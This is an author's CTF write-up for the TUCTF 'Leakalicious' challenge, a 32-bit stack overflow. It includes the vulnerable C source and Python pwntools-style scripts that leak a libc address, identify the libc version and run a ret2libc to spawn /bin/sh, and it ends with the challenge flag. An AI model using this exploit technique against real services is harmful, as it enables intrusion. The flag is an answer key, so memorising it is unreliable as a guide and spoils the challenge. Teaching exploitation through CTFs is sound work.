# Leakalicious Author Writeup

## Description

King Arthur has proposed this challenge for all those who consider themselves worthy.

*Hint:* BLUKAT ME! If only we knew what libc to use...

## A Word From The Author

This challenge aimed to subvert the standard for libc challenges. When I see a CTF challenge that gives me a libc I already have an idea of what the end goal is, and that kinda ruins it for me. I really enjoy the discovering the exploit as well as it's final culmination. In the "real world" you wouldn't be given a libc binary, so I've been told. As with this challenge, you will have to deduce the libc binary from the remote server and then find a way to obtain that libc file for offsets.

[blukat.me](https://libc.blukat.me/) is a great reference for identifying and downloading libcs. \
Although [this GIthub project](https://github.com/niklasb/libc-database) is even better for a local databse that also includes all other necessary libraries required to run it (which is great for older libcs).

## Information Gathering

``` c
#include <stdio.h>  // prints
#include <stdlib.h> // malloc
#include <string.h> // strcmp
#include <unistd.h> // read
#include <fcntl.h>  // open
#include <unistd.h> // close
#include <time.h>   // time

int main() {
    setvbuf(stdout, NULL, _IONBF, 20);
    setvbuf(stdin, NULL, _IONBF, 20);

	puts("Stop. Who would pwn this binary must answer me these questions three, ere /dev/null he see.\n");

	char buf[32];
	// This places the address of puts@libc() on the stack
	// this var can't be named puts;
	void *pts = &puts;

	printf("What... is your handle?\n> ");
	read(0, buf, 64);
	printf("hmmm... %s?\n", buf);

	printf("What... is your exploit?\n> ");
	read(0, buf, 64);
	
	printf("What... version of libc am I using?\n> ");
	read(0, buf, 64);


	return 0;
}
```
From the C code it's clear we have a buffer overflow, but what to do with it. Let's run the program to find out.

![info.png](./imgs/d8156949893a4f8b99bf9d1c9f42fc2e.png)

Here we can clearly see that the program will print my handle along with a series of garbage. This would make me think to look on the stack to see if there is anything interesting to leak off.


![stack.png](./imgs/79b1b6691502416083f60c38d015539d.png)

Sure enough we've got `puts()` conveniently placed on the stack, how nice. That stack dump is made just before the call to print() to print your handle. Great! So we'll send just enough bytes to read up to puts() on the stack and the address will be printed back, then use that to perform a ret2libc. Wait... a ret2libc only works when we have the remote libc right... and It wasn't given in the challenge. Here's where we would utilize [blukat.me](https://libc.blukat.me/). So since we know the offset on the stack we can leak the address and see what libcs contain that offset for puts().

``` python
#!/usr/bin/env python
from thpoonpwn import *

elf,libc,args = pwninit(
    remcmd =    'chal.tuctf.com 30505',
    localcmd =  './leakalicious',
#    libcid =    '',
#    libcfile =  './',
    local =     True,
#    pause =     True,
#    copy =      True,
#    ldpreload = True,
#    debug=True
)
p = pwnstart(args)
#___________________________________________________________________________________________________
# offset from buffer to puts() on the stack
pad = 32

# Send all the data, then just read what we need
p.send('A'*pad); sleep(0.1)
p.send('A'); sleep(0.1)
p.send('A'); sleep(0.1)

# Get the leaked address
p.recvuntil('hmmm... ')
p.recvuntil('A'*pad)
puts = u32(p.recv(4))

# Print out the bytes that don't change
print 'puts: ' + str(hex(puts))[-3:]

#___________________________________________________________________________________________________
pwnend(p, args)
```


![puts_leak.png](./imgs/d8fc3fb648ba4840b662ac4e9df1ca8f.png)

Ignore the *Libc File [default]*. Since we don't have the remote libc, my script automatically defaults to the local one on my machine.

Great, so it seems that **b70** is the offset from libc_base on the remote libc. Let's see what blukat has to say.

![blukat.png](./imgs/622374a283cc40bbad0791dadcd80f50.png)

We've gotten two libcs back, but that narrows it down very nicely. FYI: Both of these work for the pwn script. Let's download `libc-2.30.so` and get to work on a ret2libc() script.


## Exploitation

``` python
#!/usr/bin/env python
from thpoonpwn import *

elf,libc,args = pwninit(
    remcmd =    'chal.tuctf.com 30505',
    localcmd =  './leakalicious',
#    libcid =    '',
    libcfile =  './libc-2.30.so',
    local =     True,
#    pause =     True,
#    copy =      True,
#    ldpreload = True,
#    debug=True
)
p = pwnstart(args)
#___________________________________________________________________________________________________
# offset to leak puts
padPuts = 32
# offset to overwrite eip
padRet = 48-4

# Libc addresses
putslibc =      libc.sym['puts']
systemlibc =    libc.sym['system']
binshlibc =     next(libc.search('/bin/sh'))


# Leak address
payload = ''
payload = 'A'*padPuts
p.send(payload)

# Get Leaked address
p.recvuntil('A'*padPuts)
puts = u32(p.recv(4))
# Get those good-good addresses
system =    p32(puts + (systemlibc - putslibc))
binsh =     p32(puts + (binshlibc - putslibc))


# ret2libc
payload = ''
payload += 'A'*padRet
payload += system
payload += "RETN" # dummy return address
payload += binsh

p.send('A'); sleep(0.1)
p.send(payload);

# Clean up output
while p.can_recv(): p.recv()
p.interactive()

#___________________________________________________________________________________________________
pwnend(p, args)
```

![pwn.png](./imgs/5d9fd11c2cc34a37808e65b543b17f8d.png)

## Endgame

Libc challenges can be very fun and rewarding. Hopefully this one spiced up the genre a bit and made you think. Happy pwning.

> **flag:** TUCTF{cl0udy_w17h_4_ch4nc3_0f_l1bc}

